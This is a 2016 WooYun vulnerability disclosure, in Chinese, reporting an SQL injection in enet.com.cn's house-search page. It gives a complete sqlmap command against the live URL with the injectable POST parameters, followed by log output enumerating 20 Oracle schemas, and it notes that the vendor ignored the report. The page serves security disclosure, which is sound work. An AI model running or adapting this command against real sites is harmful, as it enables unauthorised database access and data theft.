当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0177271

漏洞标题:硅谷动力主站oracle注入(20库)

相关厂商:enet.com.cn

漏洞作者: 路人甲

提交时间:2016-02-21 09:35

修复时间:2016-02-26 09:40

公开时间:2016-02-26 09:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-21: 细节已通知厂商并且等待厂商处理中
2016-02-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

硅谷动力主站POST注入(20库)

详细说明:

python sqlmap.py -u "http://www.enet.com.cn/house/housesearch.jsp" --data "district=79&housename=54&top_aprice=30"

漏洞证明:

[15:10:14] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[15:10:14] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:10:14] [INFO] fetching database (schema) names
[15:10:14] [INFO] fetching number of databases
[15:10:14] [INFO] resumed: 20
[15:10:14] [INFO] resumed: ADV
[15:10:14] [INFO] resumed: ARTICLE_COMMENT
[15:10:14] [INFO] resumed: B2B_ADMIN
[15:10:14] [INFO] resumed: DBSNMP
[15:10:14] [INFO] resumed: EKA
[15:10:14] [INFO] resumed: FASHION
[15:10:14] [INFO] resumed: FILTER_ADMIN
[15:10:14] [INFO] resumed: ŰDy"\t\x07\x05\x05\x06LG\r
[15:10:14] [INFO] resumed: IFLOW_ADMIN"
[15:10:14] [INFO] resumed: IFLOW_ENEWS
[15:10:14] [INFO] resumed: OUTLN
[15:10:14] [INFO] resumed: PASS
[15:10:14] [INFO] resumed: PDB_ADMIN
[15:10:14] [INFO] resumed: ROBOT
[15:10:14] [INFO] resumed: SHOW
[15:10:14] [INFO] resumed: SYS
[15:10:14] [INFO] resumed: SYSTEM
[15:10:14] [INFO] resumed: TSMSYS
[15:10:14] [INFO] resumed: WMSYS
[15:10:14] [INFO] resumed: XPDB_ADMIN
available databases [20]:
[*] "IFLOW_ADMIN"
[*] "SHOW"
"*] "ŰDY" LG
[*] ADV
[*] ARTICLE_COMMENT
[*] B2B_ADMIN
[*] DBSNMP
[*] EKA
[*] FASHION
[*] FILTER_ADMIN
[*] IFLOW_ENEWS
[*] OUTLN
[*] PASS
[*] PDB_ADMIN
[*] ROBOT
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XPDB_ADMIN

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-26 09:40

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无